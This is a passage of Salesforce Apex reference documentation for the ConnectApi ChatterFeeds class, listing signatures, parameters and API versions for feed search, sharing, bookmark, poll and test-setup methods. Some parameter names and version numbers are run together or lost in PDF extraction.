Requires Chatter
Yes
Signature
public static ConnectApi.FeedItemPage searchFeedItemsInFeed(String communityId,
ConnectApi.FeedType feedType, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam, String q)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
Return Value
Type: ConnectApi.FeedItemPage
705
Reference
ChatterFeeds Class
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestSearchFeedItemsInFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedSortOrder, String,
ConnectApi.FeedItemPage)
Testing ConnectApi Code
API Version
29.031.0
Important: In version 32.0 and later, use searchFeedElementsInFeed(String, ConnectApi.FeedType, Integer, ConnectApi.FeedDensity,
String, Integer, ConnectApi.FeedSortOrder, String).
Requires Chatter
Yes
Signature
public static ConnectApi.FeedItemPage searchFeedItemsInFeed(String communityId,
ConnectApi.FeedType feedType, Integer recentCommentCount, ConnectApi.FeedDensity density,
String pageParam, Integer pageSize, ConnectApi.FeedSortOrder sortParam, String q)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
706
Reference
ChatterFeeds Class
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
Return Value
Type: ConnectApi.FeedItemPage
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestSearchFeedItemsInFeed(String, ConnectApi.FeedType, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, String, ConnectApi.FeedItemPage)
Testing ConnectApi Code
707
Reference
ChatterFeeds Class
API Version
28.031.0
Important: In version 32.0 and later, use searchFeedElementsInFeed(String, ConnectApi.FeedType, String, String).
Requires Chatter
Yes
Signature
public static ConnectApi.FeedItemPage searchFeedItemsInFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId, String q)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values include every ConnectApi.FeedType except Company and Filter.
subjectId
Type: String
If feedType is Record, subjectId can be any record ID, including a group ID. If feed type is UserProfile, subjectId
can be any user ID. If feedType is any other value, subjectId must be the ID of the context user or the alias me.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
Return Value
Type: ConnectApi.FeedItemPage
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestSearchFeedItemsInFeed(String, ConnectApi.FeedType, String, String, ConnectApi.FeedItemPage)
Testing ConnectApi Code
708
Reference
ChatterFeeds Class
API Version
28.031.0
Important: In version 32.0 and later, use searchFeedElementsInFeed(String, ConnectApi.FeedType, String, String, Integer,
ConnectApi.FeedSortOrder, String).
Requires Chatter
Yes
Signature
public static ConnectApi.FeedItemPage searchFeedItemsInFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam, String q)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values include every ConnectApi.FeedType except Company and Filter.
subjectId
Type: String
If feedType is Record, subjectId can be any record ID, including a group ID. If feedType is Topics, subjectId
must be a topic ID. If feedType is UserProfile, subjectId can be any user ID. If the feedType is any other value,
subjectId must be the ID of the context user or the alias me.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
709
Reference
ChatterFeeds Class
sortParam
Type: ConnectApi.FeedSortOrder
Specifies the order returned by the sort, such as by date created or last modified:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
q
Type: String
Search term. Searches keywords in the user or group name. A minimum of 1 character is required. This parameter does not support
wildcards. This parameter is required.
Return Value
Type: ConnectApi.FeedItemPage
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestSearchFeedItemsInFeed(String, ConnectApi.FeedType, String, String, Integer, ConnectApi.FeedSortOrder, String,
ConnectApi.FeedItemPage)
Testing ConnectApi Code
API Version
29.031.0
Important: In version 32.0 and later, use searchFeedElementsInFeed(String, ConnectApi.FeedType, String, Integer,
ConnectApi.FeedDensity, String, Integer, ConnectApi.FeedSortOrder, String).
Requires Chatter
Yes
710
Reference
ChatterFeeds Class
Signature
public static ConnectApi.FeedItemPage searchFeedItemsInFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId, Integer recentCommentCount,
ConnectApi.FeedDensity density, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam, String q)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values include every ConnectApi.FeedType except Company and Filter.
subjectId
Type: String
If feedType is Record, subjectId can be any record ID, including a group ID. If feedType is Topics, subjectId
must be a topic ID. If feedType is UserProfile, subjectId can be any user ID. If the feedType is any other value,
subjectId must be the ID of the context user or the alias me.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
711
Reference
ChatterFeeds Class
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
Return Value
Type: ConnectApi.FeedItemPage
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestSearchFeedItemsInFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, String, ConnectApi.FeedItemPage)
Testing ConnectApi Code
API Version
30.031.0
Important: In version 32.0 and later, use searchFeedElementsInFeed(String, ConnectApi.FeedType, String, Integer,
ConnectApi.FeedDensity, String, Integer, ConnectApi.FeedSortOrder, String, Boolean).
Requires Chatter
Yes
Signature
public static ConnectApi.FeedItemPage searchFeedItemsInFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId, Integer recentCommentCount,
ConnectApi.FeedDensity density, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam, String q, Boolean showInternalOnly)
712
Reference
ChatterFeeds Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
Type: String
Any record ID, including a group ID.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
showInternalOnly
Type: Boolean
713
Reference
ChatterFeeds Class
Specifies whether to show only feed items from internal (non-community) users (true), or not (false). The default value is
false.
Return Value
Type: ConnectApi.FeedItemPage
Usage
To test code that uses this method, use the matching set test method.
SEE ALSO:
setTestSearchFeedItemsInFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, String, Boolean, ConnectApi.FeedItemPage)
Testing ConnectApi Code
API Version
28.031.0
Important: In version 32.0 and later, use searchFeedElementsInFilterFeed(String, String, String, String).
Requires Chatter
Yes
Signature
public static ConnectApi.FeedItemPage searchFeedItemsInFilterFeed(String communityId,
String subjectId, String keyPrefix, String q)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
keyPrefix
Type: String
A key prefix that specifies record type. A key prefix is the first three characters in the object ID, which specifies the object type. For
example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
714
Reference
ChatterFeeds Class
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
Return Value
Type: ConnectApi.FeedItemPage
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestSearchFeedItemsInFilterFeed(String, String, String, String, ConnectApi.FeedItemPage)
Testing ConnectApi Code
API Version
28.031.0
Important: In version 32.0 and later, use searchFeedElementsInFilterFeed(String, String, String, String, Integer,
ConnectApi.FeedSortOrder, String).
Requires Chatter
Yes
Signature
public static ConnectApi.FeedItemPage searchFeedItemsInFilterFeed(String communityId,
String subjectId, String keyPrefix, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam, String q)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
715
Reference
ChatterFeeds Class
keyPrefix
Type: String
A key prefix that specifies record type. A key prefix is the first three characters in the object ID, which specifies the object type. For
example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
Return Value
Type: ConnectApi.FeedItemPage
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestSearchFeedItemsInFilterFeed(String, ConnectApi.FeedType, String, String, String, Integer, ConnectApi.FeedSortOrder, String,
ConnectApi.FeedItemPage)
Testing ConnectApi Code
716
Reference
ChatterFeeds Class
API Version
29.031.0
Important: In version 32.0 and later, use searchFeedElementsInFilterFeed(String, String, String, Integer, ConnectApi.FeedDensity,
String, Integer, ConnectApi.FeedSortOrder, String).
Requires Chatter
Yes
Signature
public static ConnectApi.FeedItemPage searchFeedItemsInFilterFeed(String communityId,
String subjectId, String keyPrefix, Integer recentCommentCount, ConnectApi.FeedDensity
density, String pageParam, Integer pageSize, ConnectApi.FeedSortOrder sortParam, String
q)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
keyPrefix
Type: String
A key prefix that specifies record type. A key prefix is the first three characters in the object ID, which specifies the object type. For
example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
717
Reference
ChatterFeeds Class
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
Return Value
Type: ConnectApi.FeedItemPage
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestSearchFeedItemsInFilterFeed(String, ConnectApi.FeedType, String, String, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, String, ConnectApi.FeedItemPage)
Testing ConnectApi Code
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElement shareFeedElement(String communityId, String
subjectId, ConnectApi.FeedElementType feedElementType, String originalFeedElementId)
Parameters
communityId
Type: String
718
Reference
ChatterFeeds Class
Type: String
The ID of the user or group with whom to share the feed element.
feedElementType
Type: ConnectApi.FeedElementType
Values are:
BundleA container of feed elements. A bundle also has a body made up of message segments that can always be gracefully
degraded to text-only values.
FeedItemA feed item has a single parent and is scoped to one community or across all communities. A feed item can have
capabilities such as boomarks, canvas, content, comment, link, poll, and so on. Feed items have a body made up of message
segments that can always be gracefully degraded to text-only values.
RecommendationA recommendation is a feed element with a recommendations capability. A recommedation suggests
records to follow, groups to join, or applications that may be helpful to the context user.
originalFeedElementId
Type: String
The ID of the feed element to share.
Return Value
Type: ConnectApi.FeedElement
SEE ALSO:
Share a Feed Element
API Version
28.031.0
Important: In version 32.0 and later, use shareFeedElement(String, String, ConnectApi.FeedElementType, String).
Requires Chatter
Yes
Signature
public static ConnectApi.FeedItem shareFeedItem(String communityId, ConnectApi.FeedType
feedType, String subjectId, String originalFeedItemId)
719
Reference
ChatterFeeds Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
Type: String
The value depends on the value of feedType:
NewssubjectId must be the ID of the context user or the keyword me.
RecordsubjectId can be a group ID or the ID of the context user (or me).
UserProfilesubjectId can be any user ID.
originalFeedItemId
Type: String
The ID of the feed item to share.
Return Value
Type: ConnectApi.FeedItem
Note: Triggers on FeedItem objects run before their attachment and capabilities information is saved, which means that
ConnectApi.FeedItem.attachment information and ConnectApi.FeedElement.capabilities information
may not be available in the trigger.
API Version
28.031.0
720
Reference
ChatterFeeds Class
Requires Chatter
Yes
Signature
public static ConnectApi.FeedItem updateBookmark(String communityId, String feedItemId,
Boolean isBookmarkedByCurrentUser)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedItemId
Type: String
The ID for a feed item.
isBookmarkedByCurrentUser
Type: Boolean
Specifying true adds the feed item to the list of bookmarks for the current user. Specify false to remove a bookmark.
Return Value
Type: ConnectApi.FeedItem
API Version
32.0
Requires Chatter
Yes
Signature
public static ConnectApi.BookmarksCapability updateFeedElementBookmarks(String
communityId, String feedElementId, ConnectApi.BookmarksCapabilityInput bookmarks)
721
Reference
ChatterFeeds Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedElementId
Type: String
The ID for a feed element.
bookmarks
Type: ConnectApi.BookmarksCapabilityInput
Information about a bookmark.
Return Value
Type: ConnectApi.BookmarksCapability
If the feed element doesnt support this capability, the return value is ConnectApi.NotFoundException on page 1086.
API Version
32.0
Requires Chatter
Yes
Signature
public static ConnectApi.BookmarksCapability updateFeedElementBookmarks(String
communityId, String feedElementId, Boolean isBookmarkedByCurrentUser)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedElementId
Type: String
The ID for a feed element.
isBookmarkedByCurrentUser
Type: Boolean
Specify whether to bookmark the feed element (true) or not (false).
722
Reference
ChatterFeeds Class
Return Value
Type: ConnectApi.BookmarksCapability
If the feed element doesnt support this capability, the return value is ConnectApi.NotFoundException on page 1086.
SEE ALSO:
Bookmark a Feed Element
API Version
32.0
Requires Chatter
Yes
Signature
public static ConnectApi.PollCapability voteOnFeedElementPoll(String communityId, String
feedElementId, String myChoiceId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedElementId
Type: String
The ID for a feed element.
myChoiceId
Type: String
The ID of the poll item to vote for. The key prefix for poll items is 09A.
Return Value
Type: ConnectApi.PollCapability Class
If the feed element doesnt support this capability, the return value is ConnectApi.NotFoundException on page 1086.
Example
ConnectApi.PollCapability poll = ConnectApi.ChatterFeeds.voteOnFeedElementPoll(null,
'0D5D0000000XZaUKAW', '09AD000000000TKMAY');
723
Reference
ChatterFeeds Class
API Version
28.031.0
Important: In version 32.0 and later, use voteOnFeedElementPoll(String, String, String).
Requires Chatter
Yes
Signature
public static ConnectApi.FeedPoll voteOnFeedPoll(String communityId, String feedItemId,
String myChoiceId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedItemId
Type: String
Specify the feed item that is associated with the poll.
myChoiceId
Type: String
Specify the ID of the item in the poll to vote for.
Return Value
Type: ConnectApi.FeedPoll
Note: Triggers on FeedItem objects run before their attachment and capabilities information is saved, which means that
ConnectApi.FeedItem.attachment information and ConnectApi.FeedElement.capabilities information
may not be available in the trigger.
724
Reference
ChatterFeeds Class
API Version
31.0
Signature
public static Void setTestGetFeedElementsFromFeed(String communityId, ConnectApi.FeedType
feedType, ConnectApi.FeedElementPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedElementsFromFeed(String, ConnectApi.FeedType)
Testing ConnectApi Code
API Version
31.0
Signature
public static Void setTestGetFeedElementsFromFeed(String communityId, ConnectApi.FeedType
feedType, String pageParam, Integer pageSize, ConnectApi.FeedSortOrder sortParam,
ConnectApi.FeedElementPage result)
725
Reference
ChatterFeeds Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The only valid value for this parameter is Company.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedElementsFromFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedSortOrder)
Testing ConnectApi Code
API Version
31.0
726
Reference
ChatterFeeds Class
Signature
public static Void setTestGetFeedElementsFromFeed(String communityId, ConnectApi.FeedType
feedType, Integer recentCommentCount, ConnectApi.FeedDensity density, String pageParam,
Integer pageSize, ConnectApi.FeedSortOrder sortParam, ConnectApi.FeedElementPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
727
Reference
ChatterFeeds Class
Return Value
Type: Void
SEE ALSO:
getFeedElementsFromFeed(String, ConnectApi.FeedType, Integer, ConnectApi.FeedDensity, String, Integer, ConnectApi.FeedSortOrder)
Testing ConnectApi Code
API Version
32.0
Signature
public static Void setTestGetFeedElementsFromFeed(String communityId, ConnectApi.FeedType
feedType, Integer recentCommentCount, ConnectApi.FeedDensity density, String pageParam,
Integer pageSize, ConnectApi.FeedSortOrder sortParam, ConnectApi.FeedFilter filter,
ConnectApi.FeedElementPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
728
Reference
ChatterFeeds Class
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
filter
Type: ConnectApi.FeedFilter
Specifies the feed filters.
AllQuestionsOnly feed elements that are questions.
SolvedQuestionsOnly feed elements that are questions and that have a best answer.
UnansweredQuestionsOnly feed elements that are questions and that dont have any answers.
UnsolvedQuestionsOnly feed elements that are questions and that dont have a best answer.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedElementsFromFeed(String, ConnectApi.FeedType, Integer, ConnectApi.FeedDensity, String, Integer, ConnectApi.FeedSortOrder,
ConnectApi.FeedFilter)
Testing ConnectApi Code
API Version
31.0
Signature
public static Void setTestGetFeedElementsFromFeed(String communityId, ConnectApi.FeedType
feedType, String subjectId, ConnectApi.FeedElementPage result)
729
Reference
ChatterFeeds Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The feed type.
subjectId
Type: String
The ID of the context user or the alias me.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedElementsFromFeed(String, ConnectApi.FeedType, String)
Testing ConnectApi Code
API Version
31.0
Signature
public static Void setTestGetFeedElementsFromFeed(String communityId, ConnectApi.FeedType
feedType, String subjectId, String pageParam, Integer pageSize, ConnectApi.FeedSortOrder
sortParam, ConnectApi.FeedElementPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
730
Reference
ChatterFeeds Class
The type of feed. Valid values include every ConnectApi.FeedType except Company, Filter, Home, and Moderation.
subjectId
Type: String
If feedType is Record, subjectId can be any record ID, including a group ID. If feedType is Topics, subjectId
must be a topic ID. If feedType is UserProfile, subjectId can be any user ID. If the feedType is any other value,
subjectId must be the ID of the context user or the alias me.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
The page contains the default number of items.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedElementsFromFeed(String, ConnectApi.FeedType, String, String, Integer, ConnectApi.FeedSortOrder)
Testing ConnectApi Code
API Version
31.0
731
Reference
ChatterFeeds Class
Signature
public static Void setTestGetFeedElementsFromFeed(String communityId, ConnectApi.FeedType
feedType, String subjectId, Integer recentCommentCount, ConnectApi.FeedDensity density,
String pageParam, Integer pageSize, ConnectApi.FeedSortOrder sortParam,
ConnectApi.FeedElementPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values include every ConnectApi.FeedType except Company, Filter, Home, and Moderation.
subjectId
Type: String
If feedType is Record, subjectId can be any record ID, including a group ID. If feedType is Topics, subjectId
must be a topic ID. If feedType is UserProfile, subjectId can be any user ID. If the feedType is any other value,
subjectId must be the ID of the context user or the alias me.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
732
Reference
ChatterFeeds Class
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedElementsFromFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder)
Testing ConnectApi Code
API Version
31.0
Signature
public static Void setTestGetFeedElementsFromFeed(String communityId, ConnectApi.FeedType
feedType, String subjectId, Integer recentCommentCount, ConnectApi.FeedDensity density,
String pageParam, Integer pageSize, ConnectApi.FeedSortOrder sortParam, Boolean
showInternalOnly, ConnectApi.FeedElementPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
Type: String
Any record ID, including a group ID.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
733
Reference
ChatterFeeds Class
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
showInternalOnly
Type: Boolean
Specifies whether to show only feed items from internal (non-community) users (true), or not (false). The default value is
false.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedElementsFromFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, Boolean)
Testing ConnectApi Code
734
Reference
ChatterFeeds Class
API Version
31.0
Signature
public static Void setTestGetFeedElementsFromFeed(String communityId, ConnectApi.FeedType
feedType, String subjectId, Integer recentCommentCount, Integer elementsPerClump,
ConnectApi.FeedDensity density, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam, Boolean showInternalOnly, ConnectApi.FeedElementPage
result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
Type: String
Any record ID, including a group ID.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
elementsPerBundle
Type: Integer
The maximum number of feed elements per bundle. The default and maximum value is 10.
density
Type: ConnectApi.FeedDensity
Type: String
735
Reference
ChatterFeeds Class
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
showInternalOnly
Type: Boolean
Specifies whether to show only feed items from internal (non-community) users (true), or not (false). The default value is
false.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedElementsFromFeed(String, ConnectApi.FeedType, String, Integer, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, Boolean)
Testing ConnectApi Code
API Version
32.0
Signature
public static Void setTestGetFeedElementsFromFeed(String communityId, ConnectApi.FeedType
feedType, String subjectId, Integer recentCommentCount, Integer elementsPerClump,
